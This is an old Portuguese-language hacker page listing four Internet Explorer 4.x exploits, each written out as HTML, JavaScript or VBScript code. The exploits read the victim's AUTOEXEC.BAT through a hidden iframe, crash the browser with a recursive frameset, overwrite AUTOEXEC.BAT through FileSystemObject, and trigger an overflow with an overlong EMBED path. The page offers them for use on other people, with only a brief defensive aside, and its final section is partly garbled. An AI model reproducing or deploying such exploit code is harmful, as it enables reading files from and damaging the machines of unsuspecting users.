Bugs Do Explore

HeHe é vc pode fazer cada coisa com o cara que estiver usando o explorer que vc nem imagina, dá até pra ver o autoexec do cara. A Micro$oft com a pressa de seus lançamentos fez cada burrada no explorer que descoberta por hackers fez com que desse para explorar todas as falhas com simples scripts. Se vc quer se defender vc tem que tirar o explorer 4.x ou inferior, no 5 as falhas diminuiram bastante mas se vc quer nenhuma falha use o Netscape ou o Opera que são excelentes navegadores. Aí está as falhas do IE:

#BUG 1#
#Esse bug no IE 4, faz com que em 5 segundos o conteudo
do
AUTOEXEC.BAT seja mostrado numa caixa de texto.
Demostrando q se esse
script
for usado para fins maliciosos, dados importantes podem
ser capturados.#
*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*BODY onLoad="init()"*
*SCRIPT LANGUAGE="JavaScript"*
function init()
{
document.all("MyFrame1").src = 'file://c:/autoexec.bat';
setTimeout ('getLinks()', 5000);
}

function getLinks()
{alert(document.all("MyFrame1").document.body.outerHTML);
}

*/SCRIPT*
*IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1"
SRC="blank.html"*
*/BODY*

                                                                                                                                         */HTML*

 

--------------------------------------

BUG 2#

Faz com que o IE entre em loop, abrindo a pagina bug.htm
infinitamente. Causando o seu travamento.

 

*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*FRAMESET ROWS = 50%,50%* v
*FRAME SRC = "bug.htm"*
*FRAME SRC = "bug.htm"*

*/FRAMESET*


*BODY*
*/BODY>
*/HTML>

-----------------------

#BUG 3#

Vulnerable : IE 4.x e VBScript Engine 3.x
Descricao: Com essa falha de seguranca na linguagem VBScript, vc
pode
rodar scripts maliciosos para sobreescrever arquivos.
*HTML>
*HEAD> */HEAD>
*BODY>*SCRIPT LANGUAGE="VBSCRIPT">

Set fs = CreateObject#"Scripting.FileSystemObject" #
Set a = fs.CreateTextFile#"C:\AUTOEXEC.BAT", True #
a.WriteLine#"@echo off"#
a.WriteLine#"echo This is a test."#
a.WriteLine#"pause"#
a.WriteLine#"@echo on"#
a.Close

*/SCRIPT>

O seu arquivo "AUTOEXEC.BAT" foi sobreescrito!

*/BODY>
*/HTML>

---------------------------

#BUG 4#
Vulnerable : IE 4.0
Descricao: Causa overflow no IE, e como decorrente o seu travamento.

 

*HTML>
SuCkEr!!!
*EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789

01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456

7890123456789012345678901234567890123456789>




40
80
160 170 180
190 200
*/HTML>